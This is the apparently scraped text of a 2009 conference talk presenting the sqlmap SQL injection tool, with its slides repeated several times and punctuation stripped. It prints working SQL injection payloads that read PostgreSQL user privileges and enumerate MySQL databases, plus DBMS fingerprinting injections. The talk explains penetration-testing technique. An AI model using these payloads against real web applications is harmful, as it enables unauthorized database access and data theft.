Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
